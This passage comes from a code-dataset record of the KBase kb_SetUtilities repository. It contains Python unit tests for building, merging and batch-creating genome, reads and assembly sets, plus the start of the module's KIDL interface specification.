Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_final_genomes = 1\n\n # GenomeSet 1\n genomeSet_obj_1 = {'description': 'test genomeSet 1',\n 'elements': {'genome_0': {'ref': genome_ref_0},\n 'genome_1': {'ref': genome_ref_1},\n 'genome_2': {'ref': genome_ref_2},\n 'genome_3': {'ref': genome_ref_3},\n }\n }\n provenance = [{}]\n genomeSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWs2Name(),\n 'objects': [\n {\n 'type': 'KBaseSearch.GenomeSet',\n 'data': genomeSet_obj_1,\n 'name': 'test_genomeSet_'+method+'.GenomeSet',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n genomeSet_ref_1 = str(genomeSet_info[WSID_I]) + '/' + str(\n genomeSet_info[OBJID_I]) + '/' + str(genomeSet_info[VERSION_I])\n\n # run method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_genome_refs': [genome_ref_1, genome_ref_2],\n 'nonlocal_genome_names': ['GCF_000022285.1_ASM2228v1_genomic'],\n 'input_genomeset_ref': genomeSet_ref_1,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Remove_Genomes_from_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(list(output_obj['elements'].keys())), num_final_genomes)\n pass\n\n #### test_KButil_Build_ReadsSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_ReadsSet_01()\") # uncomment to skip\n def test_KButil_Build_ReadsSet_01(self):\n method = 'KButil_Build_ReadsSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # figure out where the test data lives\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n # run method\n input_refs = [str(pe_lib_info_1[6]) + '/' + str(pe_lib_info_1[0]),\n str(pe_lib_info_2[6]) + '/' + str(pe_lib_info_2[0]),\n str(pe_lib_info_3[6]) + '/' + str(pe_lib_info_3[0])\n ]\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': input_refs,\n 'output_name': base_output_name,\n 'desc': 'test build readsSet'\n }\n result = self.getImpl().KButil_Build_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsLib_info = info_list[0]\n self.assertEqual(readsLib_info[1], output_name)\n self.assertEqual(readsLib_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), 3)\n pass\n\n #### test_KButil_Merge_MultipleReadsSets_to_OneReadsSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Merge_MultipleReadsSets_to_OneReadsSet_01()\") # uncomment to skip\n def test_KButil_Merge_MultipleReadsSets_to_OneReadsSet_01(self):\n method = 'KButil_Merge_MultipleReadsSets_to_OneReadsSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # figure out where the test data lives\n lib_basenames = ['test_quick', 'small', 'small_2']\n pe_lib_info = []\n lib_refs = []\n for lib_i, lib_basename in enumerate(lib_basenames):\n this_info = self.getPairedEndLibInfo(lib_basename, lib_i=lib_i)\n pe_lib_info.append(this_info)\n pprint(this_info)\n\n lib_refs.append(str(this_info[6]) + '/' + str(this_info[0]) + '/' + str(this_info[4]))\n\n # make readsSet 1\n items = [{'ref': lib_refs[0],\n 'label': lib_basenames[0]\n },\n {'ref': lib_refs[1],\n 'label': lib_basenames[1]\n }]\n desc = 'test ReadsSet 1'\n readsSet_obj_1 = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET_1'\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj_1,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n readsSet_ref_1 = str(new_obj_set_info[6]) + '/' + str(new_obj_set_info[0]) + '/' + str(\n new_obj_set_info[4])\n\n # make readsSet 2\n items = [{'ref': lib_refs[2],\n 'label': lib_basenames[2]\n }]\n desc = 'test ReadsSet 2'\n readsSet_obj_2 = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET_2'\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj_2,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n readsSet_ref_2 = str(new_obj_set_info[6]) + '/' + str(new_obj_set_info[0]) + '/' + str(\n new_obj_set_info[4])\n\n # run method\n input_refs = [readsSet_ref_1, readsSet_ref_2]\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': input_refs,\n 'output_name': base_output_name,\n 'desc': 'test merge'\n }\n result = self.getImpl().KButil_Merge_MultipleReadsSets_to_OneReadsSet(self.getContext(),\n params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.ReadsSet'\n info_list = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': self.getWsName() + '/' + output_name}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_ref = self.getWsName() + '/' + output_name\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), 3)\n pass\n\n #### test_KButil_Build_AssemblySet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Build_AssemblySet_01()\") # uncomment to skip\n def test_KButil_Build_AssemblySet_01(self):\n method = 'KButil_Build_AssemblySet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n try:\n auClient = AssemblyUtil(self.callbackURL, token=self.token)\n except Exception as e:\n raise ValueError(\n 'Unable to instantiate auClient with callbackURL: ' + self.callbackURL + ' ERROR: ' + str(\n e))\n ass_file_1 = 'assembly_1.fa'\n ass_file_2 = 'assembly_2.fa'\n ass_path_1 = os.path.join(self.scratch, ass_file_1)\n ass_path_2 = os.path.join(self.scratch, ass_file_2)\n shutil.copy(os.path.join(\"data\", ass_file_1), ass_path_1)\n shutil.copy(os.path.join(\"data\", ass_file_2), ass_path_2)\n ass_ref_1 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_1},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_1'\n })\n ass_ref_2 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_2'\n })\n\n # run method\n input_refs = [ass_ref_1, ass_ref_2]\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': input_refs,\n 'output_name': base_output_name,\n 'desc': 'test build assemblySet'\n }\n result = self.getImpl().KButil_Build_AssemblySet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.AssemblySet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n assemblySet_info = info_list[0]\n self.assertEqual(assemblySet_info[1], output_name)\n self.assertEqual(assemblySet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), len(input_refs))\n pass\n\n #### test_KButil_Batch_Create_ReadsSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_ReadsSet_01()\") # uncomment to skip\n def test_KButil_Batch_Create_ReadsSet_01(self):\n method = 'KButil_Batch_Create_ReadsSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n # run method\n # name_pattern = ''\n # expected_readsSet_length = 3\n name_pattern = 'test-*'\n expected_readsSet_length = 3\n base_output_name = method + '_output'\n output_name = base_output_name+'-01.ReadsSet'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': output_name,\n 'desc': 'test batch create readsSet'\n }\n result = self.getImpl().KButil_Batch_Create_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsSet_info = info_list[0]\n self.assertEqual(readsSet_info[1], output_name)\n self.assertEqual(readsSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_readsSet_length)\n pass\n\n #### test_KButil_Batch_Create_ReadsSet_02()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_ReadsSet_02()\") # uncomment to skip\n def test_KButil_Batch_Create_ReadsSet_02(self):\n method = 'KButil_Batch_Create_ReadsSet_02'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n se_lib_info_1 = self.getSingleEndLibInfo('test_quick', lib_i=0)\n pprint(se_lib_info_1)\n se_lib_info_2 = self.getSingleEndLibInfo('small', lib_i=1)\n pprint(se_lib_info_2)\n se_lib_info_3 = self.getSingleEndLibInfo('small_2', lib_i=2)\n pprint(se_lib_info_3)\n\n # run method\n # name_pattern = ''\n # expected_readsSet_length = 3\n name_pattern = 'test-*.se.reads'\n expected_readsSet_length = 3\n base_output_name = method + '_output'\n output_name = base_output_name+'-02.ReadsSet'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': output_name,\n 'desc': 'test batch create readsSet'\n }\n result = self.getImpl().KButil_Batch_Create_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsSet_info = info_list[0]\n self.assertEqual(readsSet_info[1], output_name)\n self.assertEqual(readsSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_readsSet_length)\n pass\n\n #### test_KButil_Batch_Create_ReadsSet_03()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_ReadsSet_03()\") # uncomment to skip\n def test_KButil_Batch_Create_ReadsSet_03(self):\n method = 'KButil_Batch_Create_ReadsSet_03'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n pe_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(pe_lib_info_1)\n pe_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(pe_lib_info_2)\n pe_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(pe_lib_info_3)\n\n se_lib_info_1 = self.getPairedEndLibInfo('test_quick', lib_i=0)\n pprint(se_lib_info_1)\n se_lib_info_2 = self.getPairedEndLibInfo('small', lib_i=1)\n pprint(se_lib_info_2)\n se_lib_info_3 = self.getPairedEndLibInfo('small_2', lib_i=2)\n pprint(se_lib_info_3)\n\n # run method\n # name_pattern = ''\n # expected_readsSet_length = 3\n name_pattern = 'test-*'\n expected_readsSet_length = 3\n base_output_name = method + '_output'\n output_name = base_output_name+'-03.ReadsSet'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': output_name,\n 'desc': 'test batch create readsSet'\n }\n result = self.getImpl().KButil_Batch_Create_ReadsSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_type = 'KBaseSets.ReadsSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n readsSet_info = info_list[0]\n self.assertEqual(readsSet_info[1], output_name)\n self.assertEqual(readsSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_readsSet_length)\n pass\n\n #### test_KButil_Batch_Create_AssemblySet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_AssemblySet_01()\") # uncomment to skip\n def test_KButil_Batch_Create_AssemblySet_01(self):\n method = 'KButil_Batch_Create_AssemblySet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # upload test data\n try:\n auClient = AssemblyUtil(self.callbackURL, token=self.token)\n except Exception as e:\n raise ValueError(\n 'Unable to instantiate auClient with callbackURL: ' + self.callbackURL + ' ERROR: ' + str(\n e))\n ass_file_1 = 'assembly_1.fa'\n ass_file_2 = 'assembly_2.fa'\n ass_path_1 = os.path.join(self.scratch, ass_file_1)\n ass_path_2 = os.path.join(self.scratch, ass_file_2)\n shutil.copy(os.path.join(\"data\", ass_file_1), ass_path_1)\n shutil.copy(os.path.join(\"data\", ass_file_2), ass_path_2)\n ass_ref_1 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_1},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_1-FOO.Assembly'\n })\n ass_ref_2 = auClient.save_assembly_from_fasta({\n 'file': {'path': ass_path_2},\n 'workspace_name': self.getWsName(),\n 'assembly_name': 'assembly_2-BAR.Assembly'\n })\n\n # run method\n # name_pattern = ''\n # expected_assemblySet_length = 2\n name_pattern = 'BAR*bly'\n expected_assemblySet_length = 1\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': base_output_name,\n 'desc': 'test batch create assemblySet'\n }\n result = self.getImpl().KButil_Batch_Create_AssemblySet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseSets.AssemblySet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n assemblySet_info = info_list[0]\n self.assertEqual(assemblySet_info[1], output_name)\n self.assertEqual(assemblySet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['items']), expected_assemblySet_length)\n pass\n\n #### test_KButil_Batch_Create_GenomeSet_01()\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Batch_Create_GenomeSet_01()\") # uncomment to skip\n def test_KButil_Batch_Create_GenomeSet_01(self):\n method = 'KButil_Batch_Create_GenomeSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n # genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n # genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n # genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n # genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n # feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n # feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n # feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n # feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_genomes = 2\n\n # run method\n # name_pattern = ''\n # expected_genomeSet_length = 2\n name_pattern = '000306*_ASM'\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'name_pattern': name_pattern,\n 'output_name': base_output_name,\n 'desc': 'test batch create genomeSet'\n }\n result = self.getImpl().KButil_Batch_Create_GenomeSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n # output_type = 'KBaseSets.GenomeSet'\n output_type = 'KBaseSearch.GenomeSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n genomeSet_info = info_list[0]\n self.assertEqual(genomeSet_info[1], output_name)\n self.assertEqual(genomeSet_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n # self.assertEqual(len(output_obj['items']), expected_genomeSet_length)\n self.assertEqual(len(output_obj['elements'].keys()), 1)\n pass\n"
},
{
"alpha_fraction": 0.6960428953170776,
"alphanum_fraction": 0.6960428953170776,
"avg_line_length": 31.08730125427246,
"blob_id": "d6908379bfe0df3e40eaf04eb6f3c2c078e04bea",
"content_id": "111461a3fdfc35eebc565cf2d998ab36c8fa4e4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 12130,
"license_type": "permissive",
"max_line_length": 208,
"num_lines": 378,
"path": "/kb_SetUtilities.spec",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "/*\n** A KBase module: kb_SetUtilities\n**\n** This module contains basic utilities for set manipulation, originally extracted\n** from kb_util_dylan\n**\n*/\n\nmodule kb_SetUtilities {\n\n /* \n ** The workspace object refs are of form:\n **\n ** objects = ws.get_objects([{'ref': params['workspace_id']+'/'+params['obj_name']}])\n **\n ** \"ref\" means the entire name combining the workspace id and the object name\n ** \"id\" is a numerical identifier of the workspace or object, and should just be used for workspace\n ** \"name\" is a string identifier of a workspace or object. This is received from Narrative.\n */\n typedef string workspace_name;\n typedef string sequence;\n typedef string data_obj_name;\n typedef string data_obj_ref;\n typedef int bool;\n\n\n /* KButil_Localize_GenomeSet()\n **\n ** Method for creating Genome Set with all local Genomes\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_ref;\n data_obj_name output_name;\n } KButil_Localize_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Localize_GenomeSet_Output;\n\n funcdef KButil_Localize_GenomeSet (KButil_Localize_GenomeSet_Params params) returns (KButil_Localize_GenomeSet_Output) authentication required;\n\n\n /* KButil_Localize_FeatureSet()\n **\n ** Method for creating Feature Set with all local Genomes\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_ref;\n data_obj_name output_name;\n } KButil_Localize_FeatureSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Localize_FeatureSet_Output;\n\n funcdef KButil_Localize_FeatureSet (KButil_Localize_FeatureSet_Params params) returns (KButil_Localize_FeatureSet_Output) authentication required;\n\n\n /* KButil_Merge_FeatureSet_Collection()\n **\n ** Method for merging FeatureSets\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Merge_FeatureSet_Collection_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Merge_FeatureSet_Collection_Output;\n\n funcdef KButil_Merge_FeatureSet_Collection (KButil_Merge_FeatureSet_Collection_Params params) returns (KButil_Merge_FeatureSet_Collection_Output) authentication required;\n\n\n /* KButil_Slice_FeatureSets_by_Genomes()\n **\n ** Method for Slicing a FeatureSet or FeatureSets by a Genome, Genomes, or GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_featureSet_refs;\n\tdata_obj_ref input_genome_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Slice_FeatureSets_by_Genomes_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Slice_FeatureSets_by_Genomes_Output;\n\n funcdef KButil_Slice_FeatureSets_by_Genomes (KButil_Slice_FeatureSets_by_Genomes_Params params) returns (KButil_Slice_FeatureSets_by_Genomes_Output) authentication required;\n\n\n /* KButil_Logical_Slice_Two_FeatureSets()\n **\n ** Method for Slicing Two FeatureSets by Venn overlap\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_featureSet_ref_A;\n\tdata_obj_ref input_featureSet_ref_B;\n\tstring operator;\n\tstring desc;\n data_obj_name output_name;\n } KButil_Logical_Slice_Two_FeatureSets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Logical_Slice_Two_FeatureSets_Output;\n\n funcdef KButil_Logical_Slice_Two_FeatureSets (KButil_Logical_Slice_Two_FeatureSets_Params params) returns (KButil_Logical_Slice_Two_FeatureSets_Output) authentication required;\n\n\n /* KButil_Logical_Slice_Two_AssemblySets()\n **\n ** Method for Slicing Two AssemblySets by Venn overlap\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_assemblySet_ref_A;\n\tdata_obj_ref input_assemblySet_ref_B;\n\tstring operator;\n\tstring desc;\n data_obj_name output_name;\n } KButil_Logical_Slice_Two_AssemblySets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Logical_Slice_Two_AssemblySets_Output;\n\n funcdef KButil_Logical_Slice_Two_AssemblySets (KButil_Logical_Slice_Two_AssemblySets_Params params) returns (KButil_Logical_Slice_Two_AssemblySets_Output) authentication required;\n\n\n /* KButil_Logical_Slice_Two_GenomeSets()\n **\n ** Method for Slicing Two AssemblySets by Venn overlap\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_genomeSet_ref_A;\n\tdata_obj_ref input_genomeSet_ref_B;\n\tstring operator;\n\tstring desc;\n data_obj_name output_name;\n } KButil_Logical_Slice_Two_GenomeSets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Logical_Slice_Two_GenomeSets_Output;\n\n funcdef KButil_Logical_Slice_Two_GenomeSets (KButil_Logical_Slice_Two_GenomeSets_Params params) returns (KButil_Logical_Slice_Two_GenomeSets_Output) authentication required;\n\n\n /* KButil_Merge_GenomeSets()\n **\n ** Method for merging GenomeSets\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Merge_GenomeSets_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Merge_GenomeSets_Output;\n\n funcdef KButil_Merge_GenomeSets (KButil_Merge_GenomeSets_Params params) returns (KButil_Merge_GenomeSets_Output) authentication required;\n\n\n /* KButil_Build_GenomeSet()\n **\n ** Method for creating a GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_GenomeSet_Output;\n\n funcdef KButil_Build_GenomeSet (KButil_Build_GenomeSet_Params params) returns (KButil_Build_GenomeSet_Output) authentication required;\n\n\n /* KButil_Build_GenomeSet_from_FeatureSet()\n **\n ** Method for obtaining a GenomeSet from a FeatureSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_ref;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_GenomeSet_from_FeatureSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_GenomeSet_from_FeatureSet_Output;\n\n funcdef KButil_Build_GenomeSet_from_FeatureSet (KButil_Build_GenomeSet_from_FeatureSet_Params params) returns (KButil_Build_GenomeSet_from_FeatureSet_Output) authentication required;\n\n\n /* KButil_Add_Genomes_to_GenomeSet()\n **\n ** Method for adding a Genome to a GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tlist<data_obj_ref> input_genome_refs;\n data_obj_ref input_genomeset_ref;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Add_Genomes_to_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Add_Genomes_to_GenomeSet_Output;\n\n funcdef KButil_Add_Genomes_to_GenomeSet (KButil_Add_Genomes_to_GenomeSet_Params params) returns (KButil_Add_Genomes_to_GenomeSet_Output) authentication required;\n\n\n /* KButil_Remove_Genomes_from_GenomeSet()\n **\n ** Method for removing Genomes from a GenomeSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tlist<data_obj_ref> input_genome_refs;\n\tlist<data_obj_name> nonlocal_genome_names;\n data_obj_ref input_genomeset_ref;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Remove_Genomes_from_GenomeSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Remove_Genomes_from_GenomeSet_Output;\n\n funcdef KButil_Remove_Genomes_from_GenomeSet (KButil_Remove_Genomes_from_GenomeSet_Params params) returns (KButil_Remove_Genomes_from_GenomeSet_Output) authentication required;\n\n\n /* KButil_Build_ReadsSet()\n **\n ** Method for creating a ReadsSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_ReadsSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_ReadsSet_Output;\n\n funcdef KButil_Build_ReadsSet (KButil_Build_ReadsSet_Params params) returns (KButil_Build_ReadsSet_Output) authentication required;\n\n\n /* KButil_Merge_MultipleReadsSets_to_OneReadsSet()\n **\n ** Method for merging multiple ReadsSets into one ReadsSet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs; /* ReadsSets */\n data_obj_name output_name; /* ReadsSet */\n\tstring desc;\n } KButil_Merge_MultipleReadsSets_to_OneReadsSet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Merge_MultipleReadsSets_to_OneReadsSet_Output;\n\n funcdef KButil_Merge_MultipleReadsSets_to_OneReadsSet (KButil_Merge_MultipleReadsSets_to_OneReadsSet_Params params) returns (KButil_Merge_MultipleReadsSets_to_OneReadsSet_Output) authentication required;\n\n\n /* KButil_Build_AssemblySet()\n **\n ** Method for creating an AssemblySet\n */\n typedef structure {\n workspace_name workspace_name;\n\tdata_obj_ref input_refs;\n data_obj_name output_name;\n\tstring desc;\n } KButil_Build_AssemblySet_Params;\n\n typedef structure {\n\tdata_obj_name report_name;\n\tdata_obj_ref report_ref;\n } KButil_Build_AssemblySet_Output;\n\n funcdef 